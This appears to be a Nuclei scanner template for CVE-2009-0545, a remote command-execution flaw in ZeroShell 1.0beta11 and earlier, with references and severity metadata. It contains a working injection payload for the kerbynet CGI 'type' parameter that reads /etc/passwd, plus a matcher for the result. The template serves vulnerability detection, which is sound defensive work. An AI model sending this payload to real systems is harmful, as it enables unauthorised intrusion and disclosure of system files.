id: CVE-2009-0545 info: name: ZeroShell <= 1.0beta11 Remote Code Execution author: geeknik severity: critical description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action. reference: - https://www.exploit-db.com/exploits/8023 - https://nvd.nist.gov/vuln/detail/CVE-2009-0545 - http://www.zeroshell.net/eng/announcements/ - http://www.ikkisoft.com/stuff/LC-2009-01.txt classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C cvss-score: 10 cve-id: CVE-2009-0545 cwe-id: CWE-20 tags: edb,cve,cve2009,zeroshell,kerbynet,rce metadata: max-request: 1 http: - method: GET path: - "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22" matchers: - type: regex part: body regex: - "root:.*:0:0:" # Enhanced by mp on 2022/04/18